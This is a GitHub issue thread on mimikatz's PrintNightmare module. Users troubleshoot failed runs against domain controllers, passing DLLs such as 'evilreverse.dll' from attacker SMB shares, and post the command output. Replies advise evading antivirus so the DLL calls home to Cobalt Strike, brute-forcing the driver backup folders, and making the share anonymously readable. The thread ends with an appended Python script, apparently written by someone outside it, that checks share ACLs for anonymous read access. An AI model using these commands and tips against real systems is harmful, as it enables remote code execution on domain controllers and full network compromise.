gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

[ERROR] kuhl_m_misc_printnightmare_CallAddPrinterDriverEx #357

Open sujit opened 3 years ago

sujit commented 3 years ago

While trying to reproduce the PrintNightmare bug, I am coming across an error condition. As per the Wireshark packet traces, I don't see any potential error for the AddPrinterDriverEx DCERPC call (screenshot attached below), though.

Any idea if I'm missing something here?

mimikatz exec:

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.40\share\calc.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.40\share\calc.dll (calc.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 5

mimikatz # 

Wireshark: [screenshot]

sujit commented 3 years ago

Target OS: Windows Server 2016 Datacenter (Domain Controller)

7MinSec commented 3 years ago

Hi @sujit , I've only played with this recently so I'm certainly no expert. However, I found the same behavior you described when my DLL payload was getting eaten by AV. I finally crafted one that did evade AV, and when that happens, the last line of output says:

ConfigFile: c:\some\path\name-of-your-DLL.dll - OK!

And then I found that my DLL executed and called home to my Cobalt Strike server.

haim-n commented 3 years ago

I'm getting the same CallAddPrinterDriverEx error, against both 2016 and 2019 DCs, with both having their AV disabled.

Would love to hear if anyone has some insights or suggestions.

Thanks!

Ug0Security commented 3 years ago

Can you confirm that the server can reach the share without credentials?

sujit commented 3 years ago

FYI, I am able to access the anonymous share from the DC box without any authentication in place. However, this time I see another error, pretty much the same one but with a different error code value:

Just curious: if anyone has a PCAP from when the exploit actually worked, would you mind sharing it? That could help me understand what might be going wrong under the hood.

mimikatz # misc::printnightmare /server:172.16.1.254 /library:\\172.16.1.15\smb\evilreverse.dll
| Remote    : 172.16.1.254
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\unidrv.dll
| DataFile  : \\172.16.1.15\smb\evilreverse.dll (evilreverse.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\evilreverse.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 3

mimikatz #

@Ug0Security ^^^

Sh0ckFR commented 3 years ago

I have the same issue on a Windows 10 VM without AV. I checked the code a bit, and I think one condition here is probably the issue (the share folder is available without credentials):

https://github.com/gentilkiwi/mimikatz/blob/c21276072b3f2a47a21e215a46962a17d54b3760/mimikatz/modules/kuhl_m_misc.c#L1439

Btw I like spaghetti :p

gentilkiwi commented 3 years ago

"the share folder is available without credentials"

If you have this in your capture (between the AddPrinterDriverEx request and response), it is because the remote share is not anonymously accessible:

[screenshot of capture]

Also, the "poc" is for a fresh system without previous attempts; you can get better results by adding /try:50, for example.

Example with previous attempt(s) of another POC

  .#####.   mimikatz 2.2.0 (x64) #19041 Jul  1 2021 03:17:37
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # misc::printnightmare /server:dc.lab.local /library:\\hack.lab.local\security\mimilib.dll /try:10
| Remote    : dc.lab.local
* KernelBase: C:\Windows\System32\kernelbase.dll
* DriverPath: C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\unidrv.dll
| DataFile  : \\hack.lab.local\security\mimilib.dll (mimilib.dll)
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\kernelbase.dll - OK!
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\2\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
 | Trying    : 3 to 10
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\3\mimilib.dll - ERROR kuhl_m_misc_printnightmare_CallAddPrinterDriverEx ; 2
> ConfigFile: C:\Windows\System32\spool\drivers\x64\3\old\4\mimilib.dll - OK!

mimikatz(commandline) # exit
Bye!

rezasarvani commented 3 years ago

Having the same problem with an anonymously accessible share and a vulnerable DC. [Capture]

muxueo commented 2 years ago

Have you solved this problem?

citronneur commented 2 years ago

I think https://github.com/cube0x0/CVE-2021-1675/pull/25 can solve the issue. Sometimes the backup folder is cleaned up properly; using this solution we can perform RCE without brute-forcing the backup folder. It's more stable.

haibara3839 commented 2 years ago

Can you tell me where calc.dll is? How do I make the calc.dll?

hitem commented 2 years ago

So, I had this issue and have been trying to solve it for a few days. I'm now able to reproduce the issue and consistently repair it. I don't know what causes this. However, every time I create a folder and share it, its ICACLS output is not 100% identical to the one that originally worked. So by exporting ICACLS, comparing, and then restoring the functional one to every other directory I tried, it works.

If it helps anyone else, feel free to try (icacls /save format: a path line followed by its SDDL line):


2
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)
2\mimidrv.sys
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimikatz.exe
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimilib.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimispool.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)


To restore it, go one step up in the folder structure from \2\ and run (in my case C:\SEC\2 would be C:\SEC): icacls C:\SEC /restore C:\SEC\rightsbackup.txt /t /c
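The comment above compares icacls dumps by eye. The following is an added example (not mimikatz code and not from anyone in this thread) that parses the icacls /save two-line format, decodes each DACL's ACEs, and reports which entries grant read access to ANONYMOUS LOGON (AN) or Everyone (WD), and which ACEs differ from a known-good dump. The "good" sample is the dump posted above; the "bad" sample, the relative path names and the focus on the AN/WD read ACEs are my constructed assumptions about what matters when the spooler fetches the DLL without credentials; the thread itself does not say which ACE made the difference. ACE ordering and inheritance evaluation are deliberately simplified.

```python
"""Parse icacls /save dumps and flag entries without anonymous/Everyone read.

Added example, not part of mimikatz or of the GitHub thread. GOOD_DUMP is the
dump posted in the thread; BAD_DUMP is a constructed variant with the AN/WD
ACEs removed from one file to show what the diff reports.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# SDDL access-right mnemonics -> access masks for file objects (sddl.h / winnt.h).
RIGHTS = {
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
FILE_GENERIC_READ = RIGHTS["FR"]
ANONYMOUS, EVERYONE = "AN", "WD"  # SDDL well-known SID abbreviations

# (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^;)]*);([^)]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str  # "A" allow, "D" deny
    flags: str     # e.g. "OICIID"
    rights: str    # e.g. "FR", "SDGXGWGR", "0x1301bf"
    trustee: str   # e.g. "AN", "WD", "BA", or a full SID


def rights_mask(rights: str) -> int:
    """Decode an SDDL rights field (hex literal or two-letter mnemonics)."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError(f"odd-length rights string: {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHTS[rights[i:i + 2]]
    return mask


def grants_read(mask: int) -> bool:
    """True if the mask covers FILE_GENERIC_READ, or generic read/all."""
    return (mask & FILE_GENERIC_READ) == FILE_GENERIC_READ \
        or bool(mask & (RIGHTS["GR"] | RIGHTS["GA"]))


def parse_dacl(sddl: str) -> list[Ace]:
    if not sddl.startswith("D:"):
        raise ValueError(f"expected a DACL string, got {sddl!r}")
    return [Ace(t, f, r, s) for t, f, r, _o, _io, s in ACE_RE.findall(sddl)]


def parse_icacls_save(text: str) -> dict[str, str]:
    """icacls /save emits pairs of lines: relative path, then its SDDL."""
    lines = [ln.rstrip("\r") for ln in text.strip().splitlines()]
    if len(lines) % 2:
        raise ValueError("dump has an unpaired line")
    return {lines[i]: lines[i + 1] for i in range(0, len(lines), 2)}


def anonymous_read(sddl: str) -> bool:
    """Simplified check: AN or WD has an allow-read ACE and neither is denied."""
    aces = parse_dacl(sddl)
    subjects = {ANONYMOUS, EVERYONE}
    denied = {a.trustee for a in aces if a.ace_type == "D" and a.trustee in subjects}
    allowed = {a.trustee for a in aces if a.ace_type == "A"
               and a.trustee in subjects and grants_read(rights_mask(a.rights))}
    return bool(allowed) and not denied


def diff_dumps(reference: dict[str, str], candidate: dict[str, str]
               ) -> dict[str, tuple[set[Ace], set[Ace]]]:
    """Per path in both dumps: (ACEs missing from candidate, ACEs only in candidate)."""
    out = {}
    for path in reference.keys() & candidate.keys():
        ref, cand = set(parse_dacl(reference[path])), set(parse_dacl(candidate[path]))
        if ref != cand:
            out[path] = (ref - cand, cand - ref)
    return out


# Dump posted in the thread, reflowed into icacls' two-line format.
GOOD_DUMP = r"""2
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;OICIIOID;SDGXGWGR;;;AU)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)(A;OICIID;0x1200a9;;;BU)
2\mimidrv.sys
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimikatz.exe
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimilib.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
2\mimispool.dll
D:AI(A;;FR;;;AN)(A;;FR;;;WD)(A;ID;0x1301bf;;;AU)(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;0x1200a9;;;BU)
"""

# Constructed: identical except mimilib.dll lost its AN and WD read ACEs.
BAD_DUMP = GOOD_DUMP.replace(
    "2\\mimilib.dll\nD:AI(A;;FR;;;AN)(A;;FR;;;WD)",
    "2\\mimilib.dll\nD:AI")


def report(text: str) -> dict[str, bool]:
    """Map each path in a dump to whether it is anonymously readable."""
    return {path: anonymous_read(sddl) for path, sddl in parse_icacls_save(text).items()}


if __name__ == "__main__":
    for path, ok in report(BAD_DUMP).items():
        print(f"{'OK ' if ok else 'BAD'} {path}")
    for path, (missing, extra) in diff_dumps(parse_icacls_save(GOOD_DUMP),
                                             parse_icacls_save(BAD_DUMP)).items():
        print(path, "missing:", sorted(a.trustee for a in missing), "extra:", sorted(a.trustee for a in extra))
```

Usage: run icacls C:\SEC /save good.txt /t on the directory that worked and again on the one that fails (icacls writes UTF-16; decode with "utf-16" before passing the text in), then feed both through diff_dumps to see exactly which ACEs differ instead of comparing the SDDL strings by eye.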